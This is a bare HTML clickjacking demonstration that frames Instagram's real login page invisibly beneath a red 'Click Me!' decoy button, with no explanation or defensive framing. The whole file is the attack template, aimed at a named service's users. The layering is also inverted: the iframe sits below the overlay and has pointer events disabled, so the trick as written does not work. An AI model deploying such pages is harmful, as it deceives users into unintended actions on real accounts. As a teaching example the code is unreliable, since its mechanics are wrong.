<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Clickjacking Example</title>
    <style>
        body {
            margin: 0;
            padding: 0;
            position: relative;
            width: 100vw;
            height: 100vh;
            background-color: #f0f0f0;
        }
        
        .overlay {
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            width: 200px;
            height: 50px;
            background-color: red;
            color: white;
            text-align: center;
            line-height: 50px;
            font-size: 18px;
            cursor: pointer;
            z-index: 10;
            /* Ensure this is above the hidden content */
        }
        
        .hidden-content {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            opacity: 0;
            /* Make it invisible */
            pointer-events: none;
            /* Prevent interaction */
            z-index: 1;
        }
        
        iframe {
            border: none;
            width: 100%;
            height: 100%;
        }
    </style>
</head>

<body>
    <div class="overlay">Click Me!</div>
    <div class="hidden-content">
        <!-- Hidden Instagram Login Page -->
        <iframe src="https://www.instagram.com/accounts/login/" title="Instagram Login"></iframe>
    </div>
</body>

</html>